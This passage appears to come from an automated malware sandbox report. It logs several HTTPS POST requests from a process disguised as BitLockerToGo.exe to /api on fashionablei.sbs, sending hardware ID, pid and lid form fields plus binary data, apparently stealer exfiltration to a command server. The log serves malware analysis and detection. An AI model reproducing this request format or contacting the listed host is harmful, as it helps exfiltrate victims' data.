                                                                                                    2024-10-24 12:42:23 UTC1369INData Raw: 32 30 34 33 0d 0a 4a 6e 55 50 71 39 31 39 44 57 4d 35 4e 6f 6d 71 50 69 43 7a 69 70 47 65 6a 50 61 38 71 62 39 35 2f 5a 32 33 64 4b 4e 6c 41 51 69 6b 5a 41 51 6f 57 32 38 4a 34 2f 78 76 48 4c 32 70 4a 71 57 49 6b 74 4e 66 6f 6d 73 35 62 4c 2b 39 6d 44 64 6b 38 37 65 52 6d 72 53 67 67 4b 6d 43 39 4a 57 77 37 4c 6c 50 75 54 51 67 73 6b 79 48 56 59 73 37 38 43 46 2f 2b 32 31 4e 74 2f 6c 32 38 46 45 62 39 53 54 50 39 38 37 36 32 48 54 71 75 6b 6c 35 72 6a 46 31 33 74 54 59 6e 36 5a 76 70 53 38 72 4b 35 34 78 5a 54 34 7a 31 70 69 31 6f 49 51 72 42 62 37 59 39 36 2f 72 51 4f 68 35 34 7a 4f 4e 68 6b 62 63 4a 48 34 36 36 71 38 2b 48 69 5a 78 59 32 55 42 44 36 4b 77 56 4b 32 5a 62 35 71 6d 72 32 76 4d 2b 61 75 31 35 5a 37 47 52 74 6d 6b 62 6d 6f 34 50 36 77 4f 34
                                                                                                    Data Ascii: 2043JnUPq919DWM5NomqPiCzipGejPa8qb95/Z23dKNlAQikZAQoW28J4/xvHL2pJqWIktNfoms5bL+9mDdk87eRmrSggKmC9JWw7LlPuTQgskyHVYs78CF/+21Nt/l28FEb9STP98762HTqukl5rjF13tTYn6ZvpS8rK54xZT4z1pi1oIQrBb7Y96/rQOh54zONhkbcJH466q8+HiZxY2UBD6KwVK2Zb5qmr2vM+au15Z7GRtmkbmo4P6wO4
                                                                                                    2024-10-24 12:42:23 UTC1369INData Raw: 47 69 7a 56 68 55 47 35 5a 62 34 75 67 66 65 34 64 66 54 70 79 38 46 37 48 52 74 6d 67 37 44 72 34 4b 7a 75 65 4e 72 58 33 39 35 53 62 38 65 58 52 74 38 4c 32 58 62 61 71 75 67 7a 6b 2f 57 55 32 7a 73 41 5a 51 44 77 38 4b 44 31 34 4b 41 47 6f 2b 48 4f 77 6c 70 72 78 34 56 42 72 33 58 6a 4e 59 79 64 72 32 33 6d 79 63 75 59 49 30 73 44 66 75 54 39 70 66 7a 72 6f 43 6e 51 34 63 37 64 56 32 7a 61 31 45 2b 68 4d 36 77 74 68 75 71 76 49 62 65 32 33 59 68 70 55 41 35 74 68 71 37 35 37 61 4b 76 65 49 75 55 6c 5a 34 61 4c 4d 50 55 57 61 46 79 37 32 66 47 6f 75 77 7a 70 62 47 37 35 68 30 49 58 44 6a 53 38 4c 7a 6a 72 70 6b 37 6c 74 6a 42 79 30 4a 53 37 34 45 43 37 7a 76 72 59 38 58 6b 6f 57 57 70 74 74 33 68 65 78 70 52 4f 5a 32 32 35 2b 50 2f 75 44 4f 4c 30 34 33
                                                                                                    Data Ascii: GizVhUG5Zb4ugfe4dfTpy8F7HRtmg7Dr4KzueNrX395Sb8eXRt8L2Xbaqugzk/WU2zsAZQDw8KD14KAGo+HOwlprx4VBr3XjNYydr23mycuYI0sDfuT9pfzroCnQ4c7dV2za1E+hM6wthuqvIbe23YhpUA5thq757aKveIuUlZ4aLMPUWaFy72fGouwzpbG75h0IXDjS8Lzjrpk7ltjBy0JS74EC7zvrY8XkoWWptt3hexpROZ225+P/uDOL043


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.449738188.114.96.34436512C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-24 12:42:23 UTC282OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 18159
                                                                                                    Host: fashionablei.sbs
                                                                                                    2024-10-24 12:42:23 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 38 38 30 39 45 31 46 30 38 34 33 45 46 44 44 44 44 31 34 32 38 41 34 39 30 45 44 44 45 34 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 32 0d 0a 2d 2d
                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"28809E1F0843EFDDDD1428A490EDDE47--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"tLYMe5--2--
                                                                                                    2024-10-24 12:42:23 UTC2828OUTData Raw: f5 4d e7 b8 03 4d ad dd 29 81 f2 25 6f 8d 9b f3 9f 07 bb ae 6e c1 f4 74 a0 46 9e dd 44 3a b6 ea f7 8d 77 8c 30 f7 2d 3a 5e 78 e6 d9 84 b0 07 c8 dc 44 8b 5c 37 7b fb ca 23 5f 36 6d 2b c9 df b7 24 a9 bc 70 d3 dd 98 da 4d 16 48 c1 d0 c9 d5 49 13 55 45 68 ed 5e ef aa d6 a5 b6 55 e8 30 13 67 aa 7a 0c 44 f5 2f c0 e3 2b e7 fb 3b 59 90 f0 70 93 c0 3f ee 4c 10 0e bb be eb 3c d7 34 e8 6e cd 74 c5 e2 cb eb 6d db e8 13 05 d7 da ba 6c 95 3d a2 38 f5 d7 4b e3 d4 69 a8 33 83 0e 15 fa 46 ca d1 d5 a4 6f 98 ff ba be f6 4f ec e7 b8 41 b9 35 35 6f df d7 6e b4 81 3d a9 b9 db c0 6c dc 0d bd e3 2e 85 05 bc 3b 82 4b 1b 1e ce 0b 47 dd 7b be cb 51 82 bb d3 d3 f4 36 9c 58 ee 7c 6d cc b2 92 e5 6e b1 c6 c7 5e d9 b7 ac 49 aa b3 55 f5 d2 ec 6d 9e f3 27 aa 33 f8 52 f0 fd e9 0a 3f 6c af
                                                                                                    Data Ascii: MM)%ontFD:w0-:^xD\7{#_6m+$pMHIUEh^U0gzD/+;Yp?L<4ntml=8Ki3FoOA55on=l.;KG{Q6X|mn^IUm'3R?l
                                                                                                    2024-10-24 12:42:24 UTC1008INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 24 Oct 2024 12:42:24 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=jovd0hos4mvt7stg4i4kfajbr5; expires=Mon, 17 Feb 2025 06:29:03 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7xSfQ%2BP6Gyo%2F5bYBo8xI7ulicoJCb2vSHSQrwr4N9KRYruSYcsT6L7pFtJuVXumfHBOxywtsFKLXOKB05gW3LAFh96AeGD3jHo9cxQIZnH0IKyHqXJXH2bnda9UY6dxXHOy5"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d7a0bec18ca2cd7-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2068&sent=10&recv=24&lost=0&retrans=0&sent_bytes=2841&recv_bytes=19121&delivery_rate=1305092&cwnd=32&unsent_bytes=0&cid=253086d1b43eac27&ts=673&x=0"
                                                                                                    2024-10-24 12:42:24 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a
                                                                                                    Data Ascii: 11ok 173.254.250.71
                                                                                                    2024-10-24 12:42:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.449739188.114.96.34436512C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-24 12:42:25 UTC281OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 8780
                                                                                                    Host: fashionablei.sbs
                                                                                                    2024-10-24 12:42:25 UTC8780OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 38 38 30 39 45 31 46 30 38 34 33 45 46 44 44 44 44 31 34 32 38 41 34 39 30 45 44 44 45 34 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 32 0d 0a 2d 2d
                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"28809E1F0843EFDDDD1428A490EDDE47--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"tLYMe5--2--
                                                                                                    2024-10-24 12:42:25 UTC1011INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 24 Oct 2024 12:42:25 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=vf3gjq8po6rrrj7pva1j4oebs2; expires=Mon, 17 Feb 2025 06:29:04 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cgUbaJPvr9leHqDccz7EsgI4O4DuDAcvlCcJuCdMPlr1e%2BkspMlx0S0D40U07sJ0vEDezBZF7OlvWHOHNuJdYiDrXXkKj%2FUO9JUdtcCR0YUznXwlG%2Br%2BpEhEGbn4NleCYoX9"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d7a0bf4a8956c70-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1246&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2840&recv_bytes=9719&delivery_rate=2292953&cwnd=251&unsent_bytes=0&cid=fc226c65f54dad28&ts=575&x=0"
                                                                                                    2024-10-24 12:42:25 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a
                                                                                                    Data Ascii: 11ok 173.254.250.71
                                                                                                    2024-10-24 12:42:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.449740188.114.96.34436512C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-24 12:42:26 UTC282OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 20433
                                                                                                    Host: fashionablei.sbs
                                                                                                    2024-10-24 12:42:26 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 38 38 30 39 45 31 46 30 38 34 33 45 46 44 44 44 44 31 34 32 38 41 34 39 30 45 44 44 45 34 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 32 0d 0a 2d 2d
                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"28809E1F0843EFDDDD1428A490EDDE47--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"tLYMe5--2--
                                                                                                    2024-10-24 12:42:26 UTC5102OUTData Raw: 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00
                                                                                                    Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                    2024-10-24 12:42:27 UTC1009INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 24 Oct 2024 12:42:27 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=aohts971o1p3b4s9q68ta5funu; expires=Mon, 17 Feb 2025 06:29:06 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gxorWeJDjKNMayEX4dCvMPr6IPJhGtQmC%2FAC4DnKMZoP8exl4IkBNQYoISC12O5408rCuY2MkJvM73oWaLYFDckjZOCba6alWcj%2FfNoGaCuRa8Q1D6caiVBOPNFFgCoAGcO0"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d7a0bfd398a285f-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1101&sent=13&recv=27&lost=0&retrans=0&sent_bytes=2840&recv_bytes=21395&delivery_rate=2205635&cwnd=233&unsent_bytes=0&cid=3d944a8bf5b1ed8d&ts=718&x=0"
                                                                                                    2024-10-24 12:42:27 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a
                                                                                                    Data Ascii: 11ok 173.254.250.71
                                                                                                    2024-10-24 12:42:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.449741188.114.96.34436512C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-24 12:42:28 UTC281OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 7094
                                                                                                    Host: fashionablei.sbs
                                                                                                    2024-10-24 12:42:28 UTC7094OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 38 38 30 39 45 31 46 30 38 34 33 45 46 44 44 44 44 31 34 32 38 41 34 39 30 45 44 44 45 34 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 32 0d 0a 2d 2d
                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"28809E1F0843EFDDDD1428A490EDDE47--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"tLYMe5--2--
                                                                                                    2024-10-24 12:42:28 UTC1009INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 24 Oct 2024 12:42:28 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=g1pn1r9geq4kgmch1vekr2674g; expires=Mon, 17 Feb 2025 06:29:07 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s66i7CpM2%2FCVHCjbQ8zoOf0C2wVOxc8bNJ1GLGjDbWWFRfRykci3GsFIXSVn8RRjRcQZzMebwccQNHQUVfl%2Bl7JK157vche1HsW5wYekvukoWr7M%2FxnsmisJYTD76Rc2J77y"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d7a0c07e93b6b28-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1031&sent=6&recv=11&lost=0&retrans=0&sent_bytes=2841&recv_bytes=8011&delivery_rate=2674053&cwnd=251&unsent_bytes=0&cid=2fbc8e54bd480a60&ts=340&x=0"
                                                                                                    2024-10-24 12:42:28 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a
                                                                                                    Data Ascii: 11ok 173.254.250.71
                                                                                                    2024-10-24 12:42:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.449742188.114.96.34436512C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-24 12:42:29 UTC281OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 7126
                                                                                                    Host: fashionablei.sbs
                                                                                                    2024-10-24 12:42:29 UTC7126OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 38 38 30 39 45 31 46 30 38 34 33 45 46 44 44 44 44 31 34 32 38 41 34 39 30 45 44 44 45 34 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 32 0d 0a 2d 2d
                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"28809E1F0843EFDDDD1428A490EDDE47--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"tLYMe5--2--
                                                                                                    2024-10-24 12:42:29 UTC1011INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 24 Oct 2024 12:42:29 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=oiosts8sb4bblm7hae04q4en45; expires=Mon, 17 Feb 2025 06:29:08 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BVPo0ctPbWoViK0r7a7%2BD6IiL2fo5GPDtQbp%2BiktxfaM8%2BvvAt3BGiMLuuKQirQ%2FOAgBW1lho0P1UhwppseQ2O3c1ADWadop8tMs74Rmq3J13aiYF21u1YDh51KgFA61jg1m"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8d7a0c0e98f46bac-DFW
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1719&sent=7&recv=12&lost=0&retrans=0&sent_bytes=2841&recv_bytes=8043&delivery_rate=1648264&cwnd=251&unsent_bytes=0&cid=033ae5048b29d65e&ts=527&x=0"
                                                                                                    2024-10-24 12:42:29 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a
                                                                                                    Data Ascii: 11ok 173.254.250.71
                                                                                                    2024-10-24 12:42:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                    Data Ascii: 0


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.449743188.114.96.34436512C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-24 12:42:30 UTC281OUTPOST /api HTTP/1.1
                                                                                                    Connection: Keep-Alive
                                                                                                    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                    Content-Length: 1243
                                                                                                    Host: fashionablei.sbs
                                                                                                    2024-10-24 12:42:30 UTC1243OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 38 38 30 39 45 31 46 30 38 34 33 45 46 44 44 44 44 31 34 32 38 41 34 39 30 45 44 44 45 34 37 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 32 0d 0a 2d 2d
                                                                                                    Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"28809E1F0843EFDDDD1428A490EDDE47--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"tLYMe5--2--
                                                                                                    2024-10-24 12:42:31 UTC1014INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 24 Oct 2024 12:42:31 GMT
                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                    Transfer-Encoding: chunked
                                                                                                    Connection: close
                                                                                                    Set-Cookie: PHPSESSID=6nmpuaams0f9dsjd22nuc1lj4k; expires=Mon, 17 Feb 2025 06:29:10 GMT; Max-Age=9999999; path=/
                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                    Pragma: no-cache
                                                                                                    cf-cache-status: DYNAMIC
                                                                                                    vary: accept-encoding
